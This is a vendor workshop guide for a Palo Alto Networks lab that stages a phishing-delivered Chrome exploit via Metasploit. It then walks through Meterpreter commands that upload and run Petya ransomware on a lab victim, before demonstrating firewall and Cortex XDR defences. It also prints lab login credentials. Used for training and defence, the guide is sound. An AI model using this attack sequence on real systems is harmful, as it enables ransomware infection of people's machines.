UTD-CybersecurityPortfolio-2.2 Workshop Guide-20221123

infosec-saas-sec-exception-4FolG6vM0bWM0mpeYVe1Q8UaS
ULTIMATE
TEST DRIVE
Cybersecurity Portfolio
Workshop Guide
UTD-CP-2.2 © 2022 Palo Alto Networks, Inc. | Confidential and Proprietary 20221123 1
Table of Contents
How to Use This Guide 4
Activity 0 – Initiate the UTD Workshop 5
Task 1 – Log in to Your Ultimate Test Drive Class Environment 5
Task 2 - Understand the UTD Environment Setup 6
Task 3 - Enable Internet Access on the ML-Powered Next-Generation Firewall 7
Task 4 – Install Cortex XDR Agent on Protected Client 8

Activity 1 – Conduct a Ransomware Attack 10
Task 1 - Brief Overview of Ransomware Attack Sequence 10
Task 2 - Check Attacker VM Status 11
Task 3 - Compromise Victim System via Exploit 12
Task 4 - Attacker to Upload and Execute the Ransomware on Victim 13
Task 5 - Execute Ransomware on the Victim Client 15
Task 6 - Test Ransomware on the Protected Client 16

Activity 2 – Protection with the ML-Powered Next-Generation Firewall 18
Task 1 - Review the Port-Based Policy for the Victim 18
Task 2 - Review the Policy for the Protected Client 20
Task 3 - Re-Run the Ransomware on the Protected Client Without URL Filtering 21
Task 4 - Re-Run the Ransomware Attack on the Protected Client 24
Task 5 - Remove the Next-Generation Firewall Protection from the Protected Client 25
Activity 3 - Cortex XDR Detection and Response Platform 27
Task 1 - Review the Cortex XDR Client Console 27
Task 2 – Introduction to Cortex XDR 28
Task 3 – Login and Review Cortex XDR 29

Activity 4 – Introduction to Panorama and Cortex Data Lake 34
Task 1 – Log into Network Security Management: Panorama 34
Task 2 – Forwarding Logs to Cortex Data Lake with Template and Device Object 36
Task 3 – Manage NGFW policies with Device Groups 38

Activity 5 – Introduction to Cortex XSOAR 40
Task 1 – Cortex XSOAR Ecosystem 40
Task 2 – Install and test a new Integration from XSOAR Marketplace 43
Task 3 – Cortex XSOAR Playbook Example 45
Task 4 – Incidents and Playbook 46
Task 5 – Other Cortex XSOAR Resources 49
Activity 6 – Protection for Public Cloud with VM-Series and Prisma Cloud 50
Task 1 – VM-Series ML-Powered Next-Generation Firewall for the Public Cloud 50
Task 2 – Manage and Deploy VM-Series in Public Cloud with Panorama Plugins 52
Task 3 – Resources for VM-Series in Public Cloud 54
Task 4 – Quick Look at Prisma Cloud and Prisma Cloud Compute Edition 55
Task 5 – Monitoring and Control Container Process with Prisma Cloud 59

Activity 7 – Quick Look at Prisma SASE (Secure Access Service Edge) 63
Task 1 – Introduction to Prisma Access 63
Task 2 – Cloud Management for Prisma Access 64
Task 3 – Autonomous Digital Experience Management (ADEM) 67
Task 4 – Prisma SD-WAN 68

Activity 8 - Feedback on Ultimate Test Drive 73
Task 1 – Take the online survey 73
How to Use This Guide
The activities outlined in this Ultimate Test Drive Workshop Guide are meant to contain all the information
necessary to navigate the workshop interface, complete the workshop activities, and troubleshoot any
potential issues with the UTD environment. This guide is meant to be used in conjunction with the
information and guidance provided by your facilitator.
Notes:
This workshop covers only basic topics and is not a substitute for training classes conducted by Palo Alto
Networks Authorized Training Centers. Please contact your partner or regional sales manager for more
information on available training and how to register for one near you.
Unless specified, the Google® Chrome™ web browser will be used to perform any tasks outlined in the
following activities (Chrome is pre-installed on the student desktop of the workshop PC).
Terminology:
Tab refers to the seven tabs along the top of each screen in the GUI.
Node refers to the options associated with each tab, found in the left-hand column of each screen.
Activity 0 – Initiate the UTD Workshop
In this activity, you will:
● Log in to the Ultimate Test Drive Workshop from your laptop.
● Learn the layout of the environment and its various components.
● Enable the firewall to facilitate connectivity.
Task 1 – Log in to Your Ultimate Test Drive Class Environment

Step 1: Verify that your laptop is equipped with a modern browser that supports HTML 5.0. We
recommend using the latest version of Firefox®, Chrome, or Internet Explorer®/Edge®.
Step 2: Open a browser window and navigate to the class URL. If you have an invitation email, you will
find the class URL and passphrase there. Otherwise, your instructor will provide them.
Enter your email address and the class passphrase.
Step 3: Complete the registration form and click Login at the bottom.
Step 4: Once you have logged in, the system will create a unique UTD environment for you. Please note
that this process may take a while, as indicated by the green progress bar at the top of the screen.
Once the environment has been created, the system will display a welcome page.
This will display a list of all virtual systems that constitute the UTD environment.
Take note of the shortcut menu at the top of your browser window. You will use this menu throughout the
workshop to switch between the available desktops. There are more tabs on the right hand side, click on
the right arrow or the 3 dots to see all the tabs.
Task 2 - Understand the UTD Environment Setup

This UTD environment consists of the following components:
● Security Admin: This is the main workstation for you, the security administrator, which you will
use to modify the settings for different Palo Alto Networks products, including the ML-Powered
Next-Generation Firewall, Cortex XDR management service, Panorama and others.
● Victim: This is a Windows® 10 virtual machine, on which you will carry out the exercises in our
workshop. This virtual machine is not protected by a firewall nor an endpoint solution. You will use
this system as the victim of the ransomware attacks in our workshop.
● Protected Client: This Windows 10 virtual system is similar to the Victim, but protected by the
Palo Alto Networks products, including the ML-Powered Next-Generation firewall and Cortex
XDR.
● Attacker: This virtual machine is a Kali Linux system that hosts Metasploit®, a penetration testing
tool. You will use this virtual machine to take on the role of the attacker in our workshop
exercises.
● VM-Series (GUI): This is the Palo Alto Networks virtual ML-Powered Next-Generation Firewall.
Review the diagram below to better understand the UTD environment setup.
Task 3 - Enable Internet Access on the ML-Powered Next-Generation
Firewall
Step 1: Click the VM-Series GUI tab to open a new tab to the VM-Series Next-Generation firewall GUI.
When you see the warning message Your connection is not private , click Advanced, and then
Proceed to <URL> (unsafe) to bypass the warning message and move on to the login page.
Log in to the firewall with the following name and password:

Name: student
Password: utd135
Close the Welcome message and you will see the Dashboard view.
Step 2: Go to the Network tab. Click on Interfaces, note that the Link State of ethernet1/1 is red, click
on ethernet1/1. You can safely ignore the warning message.
Step 3: Click the Advanced tab. Click the Link State drop-down menu to the right of the dialog box,
select up, then click OK to close the window. Click the Commit button on the top right-hand corner to
open the commit window. Commit All Changes is selected by default, click Commit again to activate the
configuration changes.
Step 4: Once the commit process has completed, you will see that the Link State of ethernet1/1 has
turned green now that the interface is up.
Task 4 – Install Cortex XDR Agent on Protected Client

Step 1: Go back to the Lab browser tab with the Click the Protected Client tab to access that desktop in
your browser.
Step 2: You should see a powershell window open with a command typed in that installs cortex XDR
agent. If It’s not present, in the windows search bar, search for powershell to open a new powershell
window. Then run the following commands:
cd C:\Users\root\Desktop
./Install-Cortex-XDR.ps1
Step 3: The script will download the XDR agent, extract it and install it. During installation, follow through
the installation prompts. This process may take a few minutes.
Step 4: Once completed, double-click the icon in the system tray to bring up the Cortex XDR agent
console. It may take a few minutes for the XDR agent to connect to Cortex XDR.
Step 4: After the installation, open the Cortex XDR using the system tray icon, then click on Check in Now
to connect to the XDR Server. This will allow the newly installed XDR client to connect to the Cortex XDR
management.
(Note: XDR version may be different from the screenshot shown above.)
End of Activity 0
Activity 1 – Conduct a Ransomware Attack
● Become the attacker and launch a ransomware attack on the Victim system.
● Experience how the Victim system is compromised through a spear phishing attack.
● Launch a ransomware attack on the Protected Client.
Task 1 - Brief Overview of Ransomware Attack Sequence

A typical ransomware attack involves two main stages:
● Compromise a victim system via exploit.
● Deliver and execute ransomware.
We will conduct a ransomware attack in this activity from both the attacker and victim perspectives. The
attacker hosts a website that delivers an exploit to the victim’s system. When the victim clicks a link in a
phishing email, he or she is redirected to the attacker’s website, where a Google Chrome JSCreate
Side-effect Type Confusion exploit compromises the victim’s system.
Once the victim’s system is compromised, the attacker uploads ransomware to the victim’s machine and
executes it.
This process is depicted in the figure below.
In the next few tasks in this activity, you will play the roles of both the attacker and the victim and see the
ransomware in action.
Task 2 - Check Attacker VM Status
Step 1: Click the Attacker tab to access that desktop in your browser. To login to the Kali VM, click on the
password field of the VM and then use CloudShare controls to enter the VM login password: CloudShare
> Keyboard > Send Password
Via CloudShare controls, click: keyboard > send password.
Once you are logged into the Attacker VM, you will see a terminal window open on the desktop.
Step 2: In the terminal window, type the following command and press the Enter/Return key:
./demo-attack.sh
This will start the exploit program and configure the Attacker VM to listen for incoming connections and
serve the Google Chrome JSCreate Side-effect Type Confusion zero-day exploit to the Victim VM. This
process may take a while, so please be patient.
When configuration is completed, the terminal should display the following prompt:
msf6 exploit(multi/browser/chrome_jscreate_sideeffect)>
The Attacker system is now ready and online, waiting for a connection from the Victim system.
Step 3: Enter sessions into the prompt to list the active sessions:
msf6 exploit(multi/browser/chrome_jscreate_sideeffect) > sessions
There should be no active sessions on the Attacker VM.
Task 3 - Compromise Victim System via Exploit

In this task, you take on the role of the victim. As the victim, you have received a spear phishing email,
which includes a hidden link to the attacker’s listener service. You will click the link, and the VM will be
compromised by the exploit delivered by the attacker’s listener service.
Step 1: Go to the Victim desktop. Click the Victim tab to open the Victim VM.
Microsoft Outlook® will be open and running on the desktop. An email with the subject line “Someone has
your password” is displayed in the preview pane. This looks like a legitimate email from Google, informing
you that someone is trying to access your device. The email suggests you review the device to ensure
your password is safe.
Step 2: Click the Review Your Devices Now link in the email. This will open Google Chrome.
You would be taken to the gmail login page where the Google Chrome browser exploit is triggered. (If the
webpage appears to be loading even after you see the gmail webpage, that’s the expected behavior or
the exploit)
In the next task, you will resume the role of the attacker and continue the next stage of the attack.
Note: When Google chrome starts, you may see a command prompt pop up and this is expected
behavior. As this is a real world exploit, a few modifications have been made to ensure that the exploit
works seamlessly in the lab environment with minimal manual steps to enhance the user experience.
Task 4 - Attacker to Upload and Execute the Ransomware on Victim

In this task, you will return to the role of the Attacker and continue the next stage of the attack by
uploading and executing ransomware on the Victim system.
Step 1: Go back to the Attacker VM. You should see the Metasploit open a “Meterpreter” session to the
Victim VM.
Step 2: To verify the session between the Attacker and Victim is open, use the “sessions” command to list
the active sessions (hit Enter/Return to get the command prompt):
msf6 exploit(multi/browser/chrome_jscreate_sideeffect) > sessions
An open session indicates that the Attacker has an active, direct connection to the Victim VM, which can
be used to further compromise the system.
Note the Id of the active session connected to the Victim VM. This is the Session Id you will need to
enter in the next step. It should be session 1.
Note: this number may be different if you refreshed the browser on the Victim VM at any point.
Step 3: Initiate an interactive session with the Victim by entering sessions –i <id> at the Metasploit
prompt. Remember to substitute your “Session Id” for the number “1” in this command if you have a
different ID number.
msf6 exploit(multi/browser/chrome_jscreate_sideeffect) > sessions –i 1
This will initiate the interactive session, display the message Starting interaction with 1… and change
the prompt to a Meterpreter prompt.
At this point, you have connected to the Victim VM and can execute any number of available commands
to exploit the system. For a list of available commands, type “?” and press Enter/Return at the
Meterpreter prompt (We will not explore the available Meterpreter commands in this exercise.). The
Attacker VM has taken control of the Victim VM at this point.
Step 4: The Attacker VM will now upload the ransomware executable file (happy.exe) to the Victim VM by
first migrating the meterpreter process into explorer.exe. Enter the following command at the prompt:
meterpreter> migrate -N explorer.exe
meterpreter> cd /Temp
meterpreter> dir
meterpreter> upload happy.exe
You should see messages confirming that happy.exe has been successfully uploaded to the Victim VM.
You can enter > dir to check that the file has been uploaded.
The Attacker VM is now ready to launch a ransomware attack on the Victim VM.
Note: The Petya ransomware is used in this exercise.
Task 5 - Execute Ransomware on the Victim Client

For this task, you must be prepared to quickly switch over to the browser tab for the Victim VM as soon as
you (as the attacker) have executed the ransomware. This ransomware acts very quickly to infect a
system, and if you remain in the Attacker environment, you will miss some of its actions.
Step 1: In the Attacker terminal window, enter the following command at the Meterpreter prompt (be
prepared to switch to the Victim VM as soon as possible):
meterpreter> execute -f 'cmd.exe /C C:\Temp\happy.exe' -H
Step 2: Quickly switch to the Victim tab. Once the ransomware executes on the Victim VM, it will simulate
a “blue screen of death” that typically accompanies a Windows system crash and reboot the Victim VM.
The ransomware will simulate the process of checking the disk on the Victim VM (the CHKDSK process).
However, the counter that indicates the progress will never stop counting.
Note: If you are connected via CloudShare RDP to the victim machine, to view the ransomware in action
causing BSOD, switch over to CON connection via CloudShare controls as the RDP connection is lost
when the victim VM reboots.
Step 3: Click on the Send Ctrl-Alt-Delete under the Keyboard button on the left side of the Victim VM
window.
The Victim VM will display a flashing, red and gray skull and crossbones image and prompt the user to
PRESS ANY KEY!
Step 4: Click inside the skull and crossbones image and press the spacebar. This should change the
image to a ransomware warning page, with a list of demands and instructions to submit payment in order
to unlock the system.
Congratulations! You are now an attacker and a victim.

You will no longer be able to use this Victim VM for the lab. Next, go back to the Attacker VM.
Step 5: On the Attacker desktop, end the Meterpreter session using the exit command:
meterpreter> exit
Step 6: This will return you to the Metasploit prompt. Execute the sessions command again to see if
there are any other open sessions. You should see none, as the Victim system has been compromised.
Note: Leave the Attacker browser tab open. We will return to it in the next activity.
Task 6 - Test Ransomware on the Protected Client

In this task, we repeat the same attack on the Protected Client VM and see what happens.
Step 1: Click the Protected Client tab. You will see the same email in the Outlook window. Also note the
Cortex XDR window behind it, which we will use in Activity 3.
Step 2: Click the Review Your Device Now link in the phishing email, as you did on the Victim VM.
You should see a Web Page Blocked message. It looks like the Protected Client is protected against
compromise from the Stage 1 attack. You can also see on the Attacker VM that no session was set up for
exploit delivery.
Note: When Google chrome starts, you may see a command prompt pop up and this is expected
behavior. As this is a real world exploit, a few modifications have been made to ensure that the exploit
works seamlessly in the lab environment with minimal manual steps to enhance the user experience.
In the next activity, we will take a closer look at how the next-generation firewall prevents the Protected
Client from the Stage 1 attack.
End of Activity 1
Activity 2 – Protection with the ML-Powered
Next-Generation Firewall
● Access the firewall and see how it helps to prevent a ransomware attack.
● Learn about the various layers of protections provided by the Palo Alto Networks ML-Powered
Next-Generation firewall.
● Witness Cortex XDR preventing a ransomware attack.
Task 1 - Review the Port-Based Policy for the Victim

In this task, you will access the firewall using the Security Admin VM to review how the ML-Powered
Next-Generation Firewall prevented the first stage of attack on the Protected Client VM in the last activity.
The firewall policies configured in this lab are designed to highlight the traffic between the Victim, Attacker
and Protected Client VMs. Policies for an actual network are likely to be different.
Step 1: Go to the VM-Series GUI tab in your browser. You can login with student / utd135 again if
needed. Check URL logs: Monitor > Logs > URL Filtering
The next few steps will give a quick walkthrough of the next-generation firewall GUI. If this is your first
time using a Palo Alto Networks ML-Powered Next-Generation firewall, you may want to read carefully.
The Dashboard tab widgets show you important information about the firewall, such as the software
version, the operational status of each interface, resource utilization, and more. All the available widgets
are displayed by default, but each administrator can remove and add individual widgets, as needed.
Step 2: Click on the ACC tab. This takes you to the Application Command Center, where you can get a
look at the applications and threats the firewall sees.
The Policies tab is where all firewall policies are configured. There are various types of policies from
Security policies that configure all firewall rules to NAT or Decryption policies that define other functions
of the next-generation firewall. Feel free to examine the different policy nodes on the left.
Step 3: Click on Security. The first rule, Victim to Attacker, is configured with a port-based firewall rule.
Click on the Victim to Attacker rule to open the Security Policy Rule configuration window. The Source
Address is set to the Victim and the Destination Address is set to the Attacker.
Step 4: The Victim to Attacker policy is a port-based policy because it allows Any applications to run on
ports 80, 443 and 8080. Review the Application and Service/URL Category tabs to confirm the policy
configuration.
While port 80 and 443 are open for both HTTP and SSL traffic, port 8080 is often opened for internal web
servers supporting internal web pages.
Step 5: Go to the Actions tab and note that Profile Setting is set to None, meaning no next-generation
protection is applied to this policy. This explains why the firewall did not provide any protection to the
Victim VM. Close the policy window.
Task 2 - Review the Policy for the Protected Client

Let’s look at the policy for the Protected Client VM and see how it is different.
Step 1: Click on the Protected Client to Attacker policy to open the Security Policy Rule configuration
window. Note that the source address and destination address are set to Protected Client and Attacker.
Step 2: Go to the Application tab. Note that only selected applications (web-browsing, SSL and Flash)
are allowed.
Step 3: Go to the Service/URL Category tab. Note that application-default is selected, so those
applications are only allowed to run on the default ports. Note that you do not need to know which ports
are needed for the applications selected. The Palo Alto Networks ML-Powered Next-Generation Firewall
keeps track of the default port for each application.
Step 4: Go to the Actions tab. Note that protection profiles are configured for Antivirus, Vulnerability
Protection, Anti-Spyware, URL Filtering, Data Filtering and WildFire Analysis. These enable many
protections offered by the firewall.
Step 5: Change the URL Filtering protection to None. Let’s see if disabling URL Filtering will let the
Attacker VM exploit the Protected Client. Click OK to close the policy window.
Step 6: Click the Commit button in the top right-hand corner to confirm the changes. Click Commit again
in the Commit window to activate the configuration changes.
Task 3 - Re-Run the Ransomware on the Protected Client Without URL

Filtering
Let’s revisit the phishing email on the Protected Client to see if removing URL Filtering protection will
allow the attacker to exploit the system.
Step 1: Go back to the Protected Client and refresh the Web Page Blocked window or click on the
Review Your Devices Now link in the phishing email again.
This time, the Google page will be allowed to open, which shows that the Protected Client VM is not
protected by URL Filtering. Let’s go to the Attacker VM and see if the exploit succeeds.
Step 2: Go to the Attacker browser tab. Note there is no listener session open. Hit enter to get back to
the prompt. Enter sessions to see if there are any open sessions. There should be none.
This indicates the Attacker was not successful in exploiting the Protected Client VM.
Step 3: Go back to the VM-Series GUI. Go to the firewall and review the traffic logs under Monitor >
Logs > Traffic. At the bottom, click Resolve hostname to enable it.
Step 4: Let’s review the traffic logs. Under the Source column, click on Protected Client. This will
populate the search window with the Protected Client VM’s source address. Then, under the Destination
column, click on Attacker to add the Attacker VM’s destination address to the filter.
Step 5: Click on the Apply Filter icon (an arrow pointing to the right) to apply the filter string.
Note that the traffic from the Protected Client VM on port 8080 is blocked by the firewall.
Does this mean all traffic on port 8080 is blocked? Let’s go to the firewall policy and find out.
Step 6: Go to the Policies > Security and look at the Internal-Web-Servers-on-8080 policy. This policy
only allows web browsing applications on port 8080 for all internal web servers supported in the policy.
Since the Attacker VM is not in the Internal-Web-Servers-on-8080 group, traffic from the Protected
Client VM is blocked.
Step 7: Let’s allow the Attacker on this policy and see if we can compromise the Protected Client VM.
Click on the Internal-Web-Servers-on-8080 policy. In the Destination tab, add Attacker to the
Destination Address.
This policy is meant to allow only web browsing on the internal web servers.
Step 8: Click the Commit button in the upper righthand corner to confirm the changes.
Task 4 - Re-Run the Ransomware Attack on the Protected Client

Now that we have removed a few more layers of protection from the firewall, let’s test the ransomware
attack again.
Step 1: Go back to the Protected Client and refresh the Google login window or click the Review Your
Devices Now link again in the phishing email. You should see the Google login page open again.
Step 2: Go to the Attacker VM and look at the Metasploit terminal. Metasploit will be trying to send the
Chrome exploit, but it will not be able to complete the process.
Step 3: Hit Enter/Return in the Metasploit prompt, then enter the sessions command to look for open
sessions. You should not see any, meaning Metasploit still failed to deliver the Chrome exploit.
Step 4: Go to the Monitor > Logs > Threat to review more about the threat that was detected. You can
see that, once again, the next-generation firewall protected the Protected Client VM from the attack.
Task 5 - Remove the Next-Generation Firewall Protection from the
Protected Client
Palo Alto Networks ML-Powered Next-Generation Firewall provides many layers of protection to prevent
attacks. Here are some of the layers applied to the Protected Client VM:
● URL Filtering with inline ML models to block access to the exploit kit URLs.
● Vulnerability protection against exploits.
● Antivirus detection to prevent malware transfer.
● App-ID to explicitly deny unknown TCP port traffic.
We will not go through every layer, but we will disable all next-generation firewall protection by putting the
Protected Client VM to the same port-based policy as the Victim VM.
Step 1: From VM-Series GUI, Go to Policies > Security > Victim-to-Attacker policy > Source tab and
add the Protected Client to this port-based policy.
Step 2: Commit the changes. Once the commit is completed, the Protected Client VM will just have the
same port-based protection as the Victim VM.
Step 3: Go to the Protected Client and refresh the Google page or go to the phishing email and click on
the Review Your Devices Now link again. The webpage will open, but after a moment, you will see a
Cortex XDR notification that a malicious activity has been blocked and Google Chrome will be closed.
Even though you have removed all next-generation firewall protections from the Protected Client VM, it is
still protected by Cortex XDR endpoint protection. We will see how Cortex XDR works to prevent the
ransomware attack on the Protected Client in the next activity.
Before we look at Cortex XDR, feel free to go back to the Attacker VM and check for an open attack
session to the Protected Client VM. Use the sessions command in the Metasploit prompt, and you
should see no open session.
End of Activity 2
Activity 3 - Cortex XDR Detection and Response
Platform
● See how Cortex XDR Prevent advanced endpoint protection prevents ransomware attacks.
● Take a quick look at Cortex XDR Pro
Task 1 - Review the Cortex XDR Client Console

In this task, you will access and review the Cortex XDR client on the Protected Client VM.
Step 1: Cortex XDR successfully detected and prevented the Google Chrome exploit session from the
Attacker VM in the last activity. Click OK to close the Cortex XDR Prevention Alert window.
Step 2: If the Cortex XDR client console is not open, double click the Cortex XDR icon on the Windows
taskbar at the bottom of the desktop. This should display the Cortex XDR client console, which will read
Advanced Endpoint Protection is Enabled.
Note the date and time of the last check-in, indicated in the bottom left of the Cortex XDR client console.
Step 3: Click the Check In Now link to connect to the Cortex XDR management service and retrieve any
updated security policies. These updates are normally done on a set heartbeat schedule.
The link will change momentarily to Connecting. Once the Cortex XDR client has completed the check-in
process, it will return to Check In Now.
Step 4: Go to the Events tab, select the event to see the details about the protection event triggered by
the exploit hosted by the Attacker VM.
Cortex XDR is a lightweight client that is centrally managed by the Cortex XDR management service. We
will review the Cortex XDR web management interface in the next task.
Task 2 – Introduction to Cortex XDR

In this task, we will log in to the Cortex XDR service and review the different types of protections offered
by Cortex XDR. Before we login to Cortex XDR, here is a quick introduction to Cortex XDR.
Cortex XDR is the world’s first detection and response app that natively integrates network, endpoint and
cloud data to stop sophisticated attacks. Cortex XDR accurately detects threats with behavioral analytics
and reveals the root cause to speed up investigations. Tight integration with enforcement points
accelerates containment, enabling you to stop attacks before the damage is done.
Here is a quick look at Cortex XDR Architecture. Cortex XDR consists of the following components:
Cortex XDR web management - A cloud-based security infrastructure service that is designed to
manage the endpoint security policy, review security events as they occur, and perform additional
analysis of associated logs.
Cortex XDR Agents - Cortex XDR agent enforces your security policy on the endpoint and sends a
report when it detects a threat.
Cortex Data Lake - A cloud-based logging infrastructure that centralizes the collection and storage of
logs generated by the Cortex XDR agents. Cortex Data Lake also supports data collection from Palo Alto
Networks ML-Powered Next-Generation Firewalls, Prisma Access. We will take a closer look on Cortex
Data Lake later in this lab.
In this next task, we will take a quick look at the Cortex XDR web management.
Task 3 – Login and Review Cortex XDR

Step 1: Go to the Cortex XDR tab in the lab, this will open the Cortex login page.
If you see an expired page, you can click on the Home under the Keyboard on the left to refresh the login
page.
Step 2: Click Next and Sign In on the Single Sign On page to log in with the supplied credentials.
Note: you will be using a Read-Only account.
You can use the Keyboard menu on the left to move forward or back in the browser window. Or click on
the Home icon to get back to the login page.
Once logged into Cortex XRD, you can get a quick glance of all connected Cortex XDR clients. The
Incident Management Dashboard provides a high-level view about the status of the incidents related to
the Cortex XDR agents managed by your Cortex XDR management service.
Step 3: Cortex XDR provides different Dashboards to allow administrator quick access to different
information. We will take a closer look at the incident with the Incident Management Dashboard.
Step 4: Under the Top Incidents (Top 10) in the Incident Management Dashboard, Cortex XDR agents
report security events when the file or process matches your applied policy rules (either default policy
rules or custom rules you define). When the event occurs, Cortex XDR applies the action specified in the
applied security profile, either to block the malicious activity, or allow and report the malicious activity.
The Cortex XDR management service ranks all events in order of severity, so you can quickly and easily
see the most important events when you log in to the Cortex XDR management service. You can then drill
down into the security events to determine if a security event is a real threat and, if so, you can remediate
it. In some cases, you may determine that a security event does not pose a real threat and can create an
exception for it.
Note: In your lab environment, all the VMs are cloned, this includes the Protected Client. The Cortex XDR
agent is also cloned and hence all events are shown under the same Endpoint name.
Click on the Behavioral Threat incident of high severity and 2 alerts to review the events when the
Cortex XDR agent identifies an attempt to run a malicious file or process. This will bring you the details of
that event in the Investigation / Incidents section.
Step 5: Go to Incident Response > Incidents, you can review the details of the selected incident, such
as Key Artifacts, Key Assets and Alerts.
Step 6: Under Key Artifacts, click on the open new page icon under Threat Intelligence to open the
WildFire Analysis report. The screenshots will be different depending on the incident that you have
selected.
Step 7: Palo Alto Networks WildFire is a cloud-delivered malware analysis service that uses data and
threat intelligence from the industry’s largest global community. This incident is triggered by the malware
test file, and you will be able to get more details on this threat. You can use the download button on the
upper left to download a copy of this report. Close the WildFire Analysis Report. Close the WildFire
Analysis Report.
Step 8: Now take a closer look under Alerts, you can learn a great deal from the records displayed in the
Alert table by scrolling to the right of the table. You can see that the incident is triggered by an exploit on
the Windows Internet Explorer. This is a good indication to investigate further in this exploit and apply the
latest patch or software upgrade if applicable.
Step 9: Cortex XDR provides multiple prevention methods, each of which include multiple purpose-built
prevention techniques tuned for maximum performance and accuracy.
These malware prevention capabilities include:
● WildFire Inspection and Analysis
● Static Analysis
● Execution Restrictions
● Trusted Publisher Identification
● Admin Override Policies
● Malware Quarantine
You can ask your instructor for an update on the latest prevention capabilities from Cortex XDR.
Step 10: Click the Endpoints > Policy Management, then click on Profiles on the left node to view the
security profiles available to Windows, macOS, Linux and Android.
Cortex XDR provides different types of Prevention Profiles that you can use out of the box to begin
protecting your endpoints from threats immediately. While security rules enable you to block or allow files
to run on your endpoints, security profiles help you customize and reuse settings across different groups
of endpoints.
● Exploit – Exploit profiles block attempts to exploit system flaws in browsers, and in the operating
system. Exploit profiles are supported for Windows, Mac, and Linux.
● Malware – Malware profiles protect against the execution of malware including trojans, viruses,
worms, and grayware. Malware profiles are supported for all platforms.
● Restriction – Restriction profiles limit where executables can run on the endpoint. Restriction profiles
are supported for the Windows platform.
● Agent Settings – Agent Settings profiles enable you to customize settings that apply to the Cortex
XDR app such as the disk space quota for log retention.
Step 11: Go to Policy Rules node to view the assigned Profiles based on operating system type.
The Cortex XDR provides out-of-the-box protection for all registered endpoints with a default security
policy for each type of platform. To fine-tune your security policy, you can customize settings in a security
profile and attach that profile to a policy rule.
Note: You are logged into a Cortex Prevent account in this lab activity. In the next task, you will take a
quick look at the Cortex XDR Pro features. However, you won’t see the same content that is in the
screenshots in the Cortex XDR Prevent account that you have logged into.
To learn more about what’s new in Cortex XDR 3.0, please visit the Cortex XDR 3.0 link below.
https://www.paloaltonetworks.com/cortex/cortex-xdr
End of Activity 3
Activity 4 – Introduction to Panorama and Cortex
Data Lake
Security deployments are complex and can overload IT teams with complex security rules and
mountains of data from multiple sources. Panorama™ network security management empowers
you with easy-to-implement, consolidated policy creation and centralized management features.
Palo Alto Networks Cortex Data Lake is a cloud-based offering for context-rich enhanced network
logs generated by our security offerings, including those of our ML-Powered Next-Generation
Firewalls, Prisma Access and Cortex XDR. The Cortex Data Lake is the cornerstone of the Palo
Alto Networks Cortex platform which provides a scalable ecosystem of security applications that
can apply advanced analytics in concert with Palo Alto Networks enforcement points to prevent
the most advanced attacks.
In this activity, we will take a quick look on how to use Panorama to enable Cortex Data Lake on
the Palo Alto Networks ML-Powered Next-Generation Firewall.
To enable the Next-Generation Firewalls to send logs to the Cortex Data Lake, the NGFWs need to be
managed by a Panorama device with the Cortex Data Lake license. The next few activities will show you
the configuration screens and their settings related to the NGFW and Panorama.
Task 1 – Log into Network Security Management: Panorama

Step 1: Click on the Panorama-GUI tab to open a new direct tab in your browser to connect to the
Panorama Web interface. If you don’t see the Panorama-GUI tab, click on the right arrow at the end of the
tabs to scroll to the Panorama GUI tab.
Login to Panorama with the following Read-Only account:
Username: student
Password: utd246
Step 2: In your Panorama, navigate to the Panorama tab, then click on the bottom left the Licenses
node.
Check that the Premium Support license and the Cortex Data Lake license are valid for this Panorama.
Step 3: Navigate to Panorama > Managed Devices > Summary and check that the Firewall is a
managed device. You will see your NGFW device is managed by Panorama.
The following steps verify that Managed Firewalls inherit the Logging Service license from Panorama.
Step 4: Go to Panorama > Device Deployment > Licenses to check that the Firewall is licensed with
Cortex Data Lake.
Task 2 – Forwarding Logs to Cortex Data Lake with Template and
Device Object
We will use Panorama to enable a group of NGFWs to forward logs to Cortex Data Lake (CDL) in this lab.
You have the option to configure CDL using the NGFW GUI but Panorama makes it much easier to apply
the same settings to multiple NGFWs.
In Panorama, ensure the Device Group and Template are set to Cortex_Data_Lake_Device_Group and
Cortex_Data_Lake_Template.
Step 1: Click on Device and select the Setup node. Make sure Cortex_Data_Lake_Template is
selected under Template.
Step 2: Navigate to the Management tab scroll down to Cortex Data Lake and view the configuration.
Both Enable Logging Service and Enable Enhanced Application Logging are enabled, and the
Region is americas.
Step 3: Navigate to the Objects > Log Forwarding, ensure Cortex_Data_Lake_Device_Group is

selected under Device Group.
Step 4: Click on Cortex_Data_Lake_Profile to review the Forward Method is set to Panorama/Cortex
Data Lake for various log types.
Step 5: Go to Policies > Security > Post Rules. Make sure the Device Group is set to
Cortex_Data_Lake_Device_Group.
Step 6: Review that the Example_policy rule has Log Forwarding set to Cortex_Data_Lake_Profile
under Log Setting. The Profile Setting for URL Filtering should be set to URL_Alert_All.
If you commit and push these settings to the firewalls in the Cortex_Data_Lake_DeviceGroup, all the
firewalls in this device group will send logs to the Cortex Data Lake. Note you will not be able to commit
change in this lab.
Task 3 – Manage NGFW policies with Device Groups
Panorama groups the firewalls in your network into logical units called device groups. A device group
enables grouping based on network segmentation, geographic location, organizational function, or any
other common aspect of firewalls that require similar policy configurations. We will take a quick look at the
pre-configured device groups here.
Step 1: Go to Panorama > Device Groups, this is where you can manage all the device groups and their
settings. In the Device / Virtual System column, you can see which firewalls are in the device groups.
Note that we have only one firewall here and it is in the Cortex_Data_Lake_Device_Group.
Step 2: Click on the Cortex_Data_Lake_Device_Group and you can review some of the options in the
device group settings. With the Parent Device Group setting, you can create Device Group hierarchy to
share the rules and objects across different devices in different device groups. Click Cancel to close the
device group window.
By using device group hierarchically, you can share rules and objects at the top, and device
group-specific rules and objects at subsequent levels. This enables you to create a hierarchy of rules that
enforce how firewalls handle traffic. We will not go into the device group hierarchy here, but if you want to
know more about it, please ask your instructor for more details.
Step 3: Click on the Policies tab to go back to the Security Policy window. Note the Device Groups text
on top of the Policies and Objects tabs, this reminds you that they are referenced by the device group
selection. You can see that there is one Post Rule in the Cortex_Data_Lake_Device_Group.
Step 4: Now, switch to the Cortex-XSoar-DeviceGroup in the Device Group drop down, notice that
there is no post rule in this device group. This demonstrates how you manage different policies and
objects using different device groups.
Step 5: Check the Pre Rules in the Cortex-Xsoar-DeviceGroup and the

Cortex_Data_Lake_Device_Group and you should see there are no Pre-Rules in both of them. You can
also look at Objects > Application Groups and see differences between the two device groups.
In the next activity, we will show you how to integrate Cortex XSOAR and Panorama with Device Group.
End of Activity 4
Activity 5 – Introduction to Cortex XSOAR
Palo Alto Networks Cortex Data Lake is a cloud-based offering for context-rich enhanced network
